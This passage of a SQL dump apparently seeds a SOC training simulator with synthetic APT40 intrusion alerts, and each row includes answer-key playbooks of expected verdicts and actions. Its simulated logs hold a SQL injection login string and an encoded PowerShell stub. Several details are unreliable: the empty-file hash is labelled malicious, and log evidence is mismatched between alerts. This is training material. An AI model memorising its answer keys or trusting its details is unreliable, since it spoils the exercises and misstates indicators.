2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.946Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:16Z\\\",\\\"source_ip\\\":\\\"10.0.1.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_exfiltration\\\",\\\"protocol\\\":\\\"satellite_link\\\",\\\"malware\\\":\\\"Turla\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(352, 'Suspicious Access to University Network', 'high', 'Firewall logs', 'APT40 exploited a known vulnerability in the university\'s web server software, gaining initial access to the network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:22:10Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":443,\"method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\",\"http_version\":\"HTTP/1.1\",\"status_code\":200,\"response_size\":5120,\"referer\":\"http://malicious.example.com\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"exploit_payload.bin\",\"action\":\"allowed\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"University web server.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"APT40 exploit payload used in multiple attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Investigation\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file name discovered during analysis.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(353, 'Execution of Custom Malware', 'high', 'Endpoint detection systems', 'APT40 executed a custom malware payload shortly after gaining access to the network. The malware is designed to operate stealthily, conducting reconnaissance and data collection.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"EVT12345\",\"event_type\":\"execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"john_doe\",\"process_name\":\"custom_malware.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"command_line\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"detection_method\":\"behavioral analysis\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\john_doe\\\\AppData\\\\Local\\\\Temp\\\\custom_malware.exe\",\"network_activity\":[{\"ip_address\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT40 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as APT40 custom malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"custom_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Custom malware filename used by 
APT40.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(354, 'Establishing Persistence via Web Shell', 'high', 'Web server logs', 'APT40 installed a web shell on the compromised server to ensure persistent access, even if initial access vectors are closed. The web shell was identified through unusual POST requests and the presence of a suspicious file on the server.', 'Persistence', 'T1505.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"request_method\":\"POST\",\"uri\":\"/uploads/shell.jsp\",\"http_version\":\"HTTP/1.1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"status_code\":200,\"response_size\":3452,\"referrer\":\"http://example.com/login\",\"file_hash\":\"1a79a4d60de6718e8e5b326e338ae533\",\"username\":\"admin\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"The IP address is associated with known APT40 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This file is recognized as a common web shell used by attackers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a79a4d60de6718e8e5b326e338ae533\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Bazaar\",\"verdict\":\"suspicious\",\"details\":\"The hash matches files used in recent APT campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common username for administrative access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.949Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"request_method\\\":\\\"POST\\\",\\\"uri\\\":\\\"/uploads/shell.jsp\\\",\\\"http_version\\\":\\\"HTTP/1.1\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"status_code\\\":200,\\\"response_size\\\":3452,\\\"referrer\\\":\\\"http://example.com/login\\\",\\\"file_hash\\\":\\\"1a79a4d60de6718e8e5b326e338ae533\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(355, 'Lateral Movement to Secure Data Sources', 'high', 'Network traffic analysis', 'The attackers used legitimate credentials obtained during the initial breach to navigate through the network, reaching sensitive research databases containing proprietary sonar technology schematics.', 'Lateral Movement', 'T1078', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login using compromised credentials\",\"file_accessed\":\"/network_share/sonar_schematics_v2.pdf\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"Access granted to sensitive data after lateral move\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Research database server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in unauthorized access\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"clean\",\"details\":\"No known issues with file hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, 
NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(356, 'Exfiltration of Sonar Technology Schematics', 'high', 'Data loss prevention (DLP) systems', 'APT40 utilized encrypted channels to transfer the stolen sonar technology schematics to external servers, completing their data theft operation. The data exfiltration was detected by DLP systems monitoring outgoing traffic. The transfer was executed using the file \'sonar_tech_designs.zip\' over an encrypted connection to a known malicious IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:53:12Z\",\"source_ip\":\"10.0.10.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"sonar_tech_designs.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"transfer_size\":10485760,\"alert_trigger\":\"DLP Policy: Sensitive Data Exfiltration\",\"encryption\":\"TLSv1.2\"}', '2026-01-03 00:42:39', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT40 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"sonar_tech_designs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive sonar schematics.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in previous exfiltration attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"User account associated with current 
employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.951Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:53:12Z\\\",\\\"source_ip\\\":\\\"10.0.10.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"sonar_tech_designs.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"transfer_size\\\":10485760,\\\"alert_trigger\\\":\\\"DLP Policy: Sensitive Data Exfiltration\\\",\\\"encryption\\\":\\\"TLSv1.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(357, 'Suspicious Web Traffic Detected', 'high', 'Web Proxy Logs', 'A suspicious drive-by download was detected from a compromised ad network, which delivered an initial payload to an internal workstation, potentially leading to unauthorized access.', 'Drive-by Download', 'T1189: Drive-by Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:01Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"url\":\"http://malicious-ad-network.com/ads\",\"method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://trusted-news-portal.com\",\"filename\":\"exploit_kit.js\",\"hash\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"username\":\"jdoe\"}', '2026-01-03 00:50:36', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-ad-network.com/ads\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit kit\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_kit.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Identified as part of an exploit 
kit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:01Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"url\\\":\\\"http://malicious-ad-network.com/ads\\\",\\\"method\\\":\\\"GET\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://trusted-news-portal.com\\\",\\\"filename\\\":\\\"exploit_kit.js\\\",\\\"hash\\\":\\\"b5f3c8e9d6a8f5b9e2f7c4d8a1b3a5e6\\\",\\\"username\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.952Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
